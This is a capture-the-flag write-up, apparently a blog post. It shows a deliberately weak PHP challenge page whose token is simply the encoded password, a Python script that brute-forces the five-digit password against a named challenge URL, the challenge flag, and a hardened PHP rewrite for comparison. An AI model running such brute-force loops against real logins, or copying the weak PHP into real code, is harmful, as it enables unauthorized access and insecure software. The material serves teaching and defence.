GJCTF mock challenge: brute-forcing the site admin password with Python
阿新 • Published: 2018-11-20
Challenge address: http://www.czlgjbbq.top/GJCTF/brute.php
PHP source:
<?php
error_reporting(0);
session_start();
if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){
    $rand_number = rand(10000,99999);
    setcookie('f14g',1);
    $_SESSION['token'] = base64_encode(base64_encode($rand_number));
}
echo "當前session值:".$_SESSION['token'];
?>
<html>
<head><title>你能進來嗎?</title></head>
<body>
<form action="./brute.php" method="GET">
<input type="text" name="password" placeholder="請輸入五位數密碼!" value="">
<input type="hidden" name="check" value="<?php echo $_SESSION['token'];?>">
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
<?php
if($_SESSION['token'] == $_GET['check']){
    $password = $_GET['password'];
    echo $password;
    if($password == base64_decode(base64_decode($_SESSION['token']))){
        echo "flag:GJCTF{anjjPONFAkg};";
    }else{
        echo "error!";
    }
}else{
    echo "session error!";
}
?>
From the source we can see that the token (and with it the password) is only regenerated when the f14g cookie or the session token is missing, so a client that keeps its cookies sees the same session value on every request and the password never changes.
So here we use a Python script built on requests.Session, which stores and resends the cookies for us, so the session value, and therefore the backend admin password, is not regenerated between requests.
Python script:
import re
import requests

URL = 'http://www.czlgjbbq.top/GJCTF/brute.php'

# A Session object keeps the PHPSESSID and f14g cookies across requests,
# so the server never regenerates the token (and the password) in between.
s = requests.Session()
html = s.get(URL)

# Read the token from the hidden "check" field of the form.
# (Regex reconstructed from the PHP form above; the original pattern was lost.)
pattern = r'name="check" value="([^"]*)"'
ss = re.search(pattern, html.text)
session = ss.group(1)
# print(session)

# rand(10000,99999) in the PHP is inclusive, so the last candidate is 99999.
for i in range(10000, 100000):
    payload = {'password': str(i), 'check': session}
    # print(payload)
    html = s.get(url=URL, params=payload)
    # The flag is not at the start of the response, so search instead of match.
    if 'GJCTF' in html.text:
        print(html.text)
        break
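For comparison, here is a hardened rewrite of the challenge page. This is an added example, not the original challenge code, and it assumes PHP 7.0 or later (for random_int, random_bytes and hash_equals) with server-side session storage; the attempt limit MAX_ATTEMPTS is a hypothetical policy value. It keeps the per-session secret that the original relies on, but removes the properties the script above exploits: the token is independent random data rather than an encoding of the secret, guesses are counted and capped per session, comparisons are strict and constant-time, the guess travels in a POST body instead of the query string, and nothing the user sends is echoed back unescaped.

```php
<?php
// Hardened rewrite of the challenge page (added example, not the original code).
// Assumes PHP 7.0+ and server-side sessions.
error_reporting(E_ALL);
session_start();

const MAX_ATTEMPTS = 5;   // hypothetical policy value

if (empty($_SESSION['password'])) {
    // Secret comes from a CSPRNG and is never derived from the token.
    $_SESSION['password'] = (string) random_int(10000, 99999);
    $_SESSION['attempts'] = 0;
}
if (empty($_SESSION['token'])) {
    // Form token is independent random bytes; it says nothing about the secret.
    $_SESSION['token'] = bin2hex(random_bytes(16));
}

$result = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $check    = (string) ($_POST['check'] ?? '');
    $password = (string) ($_POST['password'] ?? '');

    if (!hash_equals($_SESSION['token'], $check)) {
        // Strict, constant-time token check instead of loose ==.
        http_response_code(403);
        $result = 'session error!';
    } elseif ($_SESSION['attempts'] >= MAX_ATTEMPTS) {
        // Keeping the cookies no longer buys unlimited guesses; a fresh
        // session gets a fresh secret, as in the original design.
        http_response_code(429);
        $result = 'too many attempts; start a new session';
    } else {
        $_SESSION['attempts']++;
        if (hash_equals($_SESSION['password'], $password)) {
            $result = 'flag:GJCTF{anjjPONFAkg};';   // flag text from the original page
        } else {
            $result = 'error!';
        }
    }
}
?>
<html>
<head><title>你能進來嗎?</title></head>
<body>
<form action="./brute.php" method="POST">
<input type="text" name="password" placeholder="請輸入五位數密碼!" value="">
<input type="hidden" name="check" value="<?php echo htmlspecialchars($_SESSION['token'], ENT_QUOTES, 'UTF-8'); ?>">
<input type="submit" name="submit" value="提交">
</form>
<!-- Output is escaped; the submitted password is never reflected. -->
<p><?php echo htmlspecialchars($result, ENT_QUOTES, 'UTF-8'); ?></p>
</body>
</html>
```

With this version, a client that keeps its cookies gets at most MAX_ATTEMPTS guesses against one secret, and a client that drops them starts over against a new one, so the 90,000-candidate sweep in the script above no longer converges. The lockout is per session rather than per IP, which is enough for a five-digit toy; a real login would add IP- or account-level throttling and logging of repeated 429 responses as a detection signal.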